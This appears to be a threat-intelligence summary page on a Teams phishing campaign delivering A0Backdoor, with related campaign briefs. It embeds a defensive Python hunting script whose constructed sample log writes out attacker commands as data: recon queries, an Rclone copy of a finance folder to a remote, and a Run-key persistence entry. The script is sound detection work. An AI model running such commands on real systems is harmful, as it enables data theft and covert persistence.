A0Backdoor Malware Deployed via Microsoft Teams Phishing Campaign

1 unique source, 2 articles

Summary

A phishing campaign targeting financial and healthcare organizations uses Microsoft Teams to impersonate IT staff and trick victims into granting remote access via Quick Assist, after which the A0Backdoor malware is deployed. The campaign, linked to the BlackBasta ransomware group, relies on digitally signed MSI installers, C2 communication carried over DNS MX records, and DLL sideloading with legitimate Microsoft binaries. The intrusion is multi-stage: external (cross-tenant) Teams chats impersonating IT staff are used to start a Quick Assist session; once inside, the attackers perform reconnaissance, deploy payloads via DLL sideloading alongside signed applications, and move laterally with Windows Remote Management (WinRM). Exfiltration is targeted and uses tools such as Rclone to copy sensitive data to external cloud storage, so the malicious activity blends with legitimate administrative operations.

Timeline

  1. 10.03.2026 00:50 · 2 articles

    A0Backdoor Malware Deployed via Microsoft Teams Phishing Campaign

    Microsoft issues a warning that threat actors are increasingly abusing external Microsoft Teams collaboration to impersonate IT or helpdesk staff over cross-tenant chats, tricking victims into granting remote access that is then used for data theft. The attackers rely on legitimate tools such as Quick Assist and Rclone to move files to external cloud storage, so the activity blends in with normal IT support operations. The article details a nine-stage attack chain: an external Teams chat impersonating IT staff, Quick Assist for initial access, reconnaissance via Command Prompt and PowerShell, DLL sideloading with signed applications (e.g., Autodesk, Adobe Acrobat/Reader, Windows Error Reporting) for payload execution, lateral movement via Windows Remote Management (WinRM), and targeted exfiltration with Rclone or similar tools to external cloud storage. C2 communication runs over HTTPS to evade detection, and persistence is maintained through Windows Registry modifications. This expands on the initial campaign's TTPs and confirms the abuse of Quick Assist and DLL sideloading as part of a refined, low-noise intrusion methodology.
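The chain above maps directly onto a host-level hunt. The following Python is an added example, not code from Microsoft's advisory or from this page: it correlates process-creation events in a hypothetical pipe-delimited export (the hostnames, users, paths and command lines are constructed) and flags a host where a Quick Assist launch is followed within a time window by at least two later stages of the chain. Reconnaissance is matched on cmd/PowerShell command-line tokens, WinRM on Invoke-Command/Enter-PSSession or wsmprovhost.exe, exfiltration on rclone.exe, persistence on a Run-key write, and sideloading is approximated by a known sideload host such as AcroRd32.exe running outside Program Files or the Windows directory (a path heuristic, since the log carries no signature or loaded-module data).

```python
"""Added example: correlate process-creation events into the Teams / Quick Assist
intrusion chain. All sample data below is constructed, not real telemetry."""
from collections import defaultdict
from datetime import datetime, timedelta
import ntpath

# Chain stages in the order the report lists them. The Teams chat itself leaves
# no host process event, so the hunt anchors on the Quick Assist launch.
STAGES = ("quick_assist", "recon", "sideload", "winrm", "exfil", "persistence")

RECON_TOKENS = ("whoami", "nltest", "net group", "net user", "systeminfo", "quser", "ipconfig")
WINRM_TOKENS = ("invoke-command", "enter-pssession", "-computername")
# Signed binaries named in the report as sideload hosts (Adobe Acrobat/Reader,
# Windows Error Reporting). Autodesk is omitted because no image name is given.
SIDELOAD_TARGETS = {"acrord32.exe", "acrobat.exe", "werfault.exe", "wermgr.exe"}
# Assumption: these binaries normally live only under these prefixes.
TRUSTED_PREFIXES = ("c:\\program files", "c:\\windows\\")

# Constructed events in a hypothetical export format:
# timestamp|host|user|image|command_line   (command lines never contain '|')
SAMPLE_EVENTS = r"""
2026-03-09T09:00:12|WS-01|alice|C:\Windows\System32\quickassist.exe|quickassist.exe
2026-03-09T09:04:30|WS-01|alice|C:\Windows\System32\cmd.exe|cmd.exe /c whoami /all & nltest /dclist:corp.example
2026-03-09T09:11:05|WS-01|alice|C:\Users\alice\AppData\Local\Temp\Reader\AcroRd32.exe|AcroRd32.exe
2026-03-09T09:25:41|WS-01|alice|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -c "Invoke-Command -ComputerName FS-01 -ScriptBlock { whoami }"
2026-03-09T09:48:00|WS-01|alice|C:\Users\alice\AppData\Local\Temp\rclone.exe|rclone.exe copy C:\Finance remote:backup --transfers 8
2026-03-09T09:52:10|WS-01|alice|C:\Windows\System32\reg.exe|reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /d C:\Users\alice\AppData\Local\Temp\Reader\AcroRd32.exe /f
2026-03-09T10:15:00|WS-02|bob|C:\Windows\System32\quickassist.exe|quickassist.exe
2026-03-09T10:20:00|WS-02|bob|C:\Windows\System32\msiexec.exe|msiexec.exe /i printer-driver.msi /qn
2026-03-09T11:00:00|WS-03|svc_backup|C:\Program Files\rclone\rclone.exe|rclone.exe sync D:\Backups offsite:nightly
"""


def classify(image, command_line):
    """Map one process-creation event to a chain stage, or None if it matches nothing."""
    image = image.lower()
    exe = ntpath.basename(image)
    cmd = command_line.lower()
    if exe == "quickassist.exe":
        return "quick_assist"
    if exe in ("cmd.exe", "powershell.exe", "pwsh.exe"):
        # Check WinRM first: a remoting command line may also carry recon tokens.
        if any(t in cmd for t in WINRM_TOKENS):
            return "winrm"
        if any(t in cmd for t in RECON_TOKENS):
            return "recon"
        if "currentversion\\run" in cmd:
            return "persistence"
    if exe in ("wsmprovhost.exe", "winrs.exe"):
        return "winrm"
    if exe in SIDELOAD_TARGETS and not image.startswith(TRUSTED_PREFIXES):
        return "sideload"
    if exe == "rclone.exe":
        return "exfil"
    if exe == "reg.exe" and "\\currentversion\\run" in cmd:
        return "persistence"
    return None


def hunt(raw_events, window=timedelta(hours=2)):
    """Return per-host findings: stages seen in order, follow-up stages inside the
    window after the first Quick Assist launch, and whether that warrants an alert."""
    per_host = defaultdict(list)
    for line in raw_events.strip().splitlines():
        ts, host, _user, image, cmd = line.split("|", 4)
        stage = classify(image, cmd)
        if stage:
            per_host[host].append((datetime.fromisoformat(ts), stage))

    findings = {}
    for host, hits in per_host.items():
        hits.sort()
        ordered = []
        for _, stage in hits:
            if stage not in ordered:
                ordered.append(stage)
        anchors = [t for t, s in hits if s == "quick_assist"]
        followups = set()
        if anchors:
            start = anchors[0]
            followups = {s for t, s in hits
                         if s != "quick_assist" and start <= t <= start + window}
        findings[host] = {
            "stages": ordered,
            "followups": sorted(followups, key=STAGES.index),
            # Quick Assist alone is normal helpdesk activity; require two later stages.
            "alert": len(followups) >= 2,
        }
    return findings


if __name__ == "__main__":
    for host, result in hunt(SAMPLE_EVENTS).items():
        flag = "ALERT" if result["alert"] else "ok"
        print(f"{host}: {flag} stages={result['stages']} followups={result['followups']}")
```

On real telemetry the same logic would read Sysmon Event ID 1 or Security 4688 records; the two-stage threshold and the two-hour window are tuning knobs, and the path heuristic for sideloading should be replaced with module-load (Sysmon Event ID 7) data where available, since a signed host binary copied next to a malicious DLL is the actual indicator.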

Similar Happenings

Payouts King ransomware leverages QEMU-based hidden VMs for covert operations and persistence

The Payouts King ransomware operation has integrated the QEMU emulator to deploy hidden Alpine Linux virtual machines (VMs) on compromised hosts, enabling attackers to bypass endpoint security controls and execute malicious activities without detection. Using reverse SSH tunnels and scheduled tasks, threat actors associated with the GOLD ENCOUNTER group operate these VMs to harvest credentials, perform Active Directory reconnaissance, and stage data for exfiltration. Initial access vectors include exploitation of SonicWall VPNs, CitrixBleed 2 (CVE-2025-5777), Cisco SSL VPNs, and social engineering via Microsoft Teams phishing. The campaign employs multi-stage encryption, toolchain customization, and anti-analysis techniques to maintain persistence and evade detection.

Oyster Malware Distributed via Fake Microsoft Teams Installers

A malvertising campaign uses SEO poisoning to push fake Microsoft Teams installers that deploy the Oyster backdoor (also tracked as OysterLoader, Broomstick and CleanUpLoader) on Windows devices. Users searching for 'Teams download' are steered to a site that mimics Microsoft's official download page and offered a malicious MSTeamsSetup.exe in place of the legitimate client. The installer, signed with legitimate certificates, drops a DLL into the %APPDATA%\Roaming folder and creates a scheduled task for persistence; the backdoor gives the operators remote access to corporate networks for command execution, payload deployment and file transfer.

Blackpoint Cyber first disclosed the campaign in September 2025. In October 2025 Microsoft revoked more than 200 certificates used to sign malicious Teams installers in a wave of Rhysida ransomware attacks; the actor had obtained signatures for the installers and other post-compromise tools through the Trusted Signing, SSL.com, DigiCert and GlobalSign code signing services. The activity is attributed to Vanilla Tempest (also tracked as VICE SPIDER and Vice Society), a financially motivated group focused on deploying ransomware and exfiltrating data for extortion, and Oyster itself has been linked to multiple campaigns and ransomware operations, including Rhysida. In early 2026 OysterLoader gained new C2 infrastructure and obfuscation methods, including a multi-stage infection chain and dynamic API resolution to hinder detection and analysis.

TA415 (APT41) Abuses Velociraptor Forensic Tool for C2 Tunneling via Visual Studio Code

Threat actors assessed to be TA415 (APT41) deployed the open-source Velociraptor forensic tool to download and execute Visual Studio Code, most likely for command-and-control (C2) tunneling. The intrusion relied on legitimate software and built-in Windows utilities to keep the malware footprint small while maintaining a foothold. It began with the Windows msiexec utility fetching an MSI installer from a Cloudflare Workers domain; Velociraptor then contacted a second Cloudflare Workers domain, used for staging and additional payloads, to download and run Visual Studio Code with tunneling enabled. The resulting tunnel provided remote access and code execution, which could lead to further activity such as ransomware deployment.

The accompanying phishing campaign targeted US government, think tank and academic organizations working on US-China relations, economic policy and international trade. The attackers impersonated the US-China Business Council and John Moolenaar, Chair of the Select Committee on Strategic Competition between the US and the Chinese Communist Party. The messages linked to password-protected archives hosted on cloud services, each containing a shortcut (LNK) file and a hidden subfolder. Launching the LNK file ran a batch script that downloaded the VS Code Command Line Interface (CLI) from Microsoft's servers, created a scheduled task for persistence, and established a VS Code remote tunnel authenticated via GitHub; the script also collected system information and the contents of several user directories and sent them to the attackers.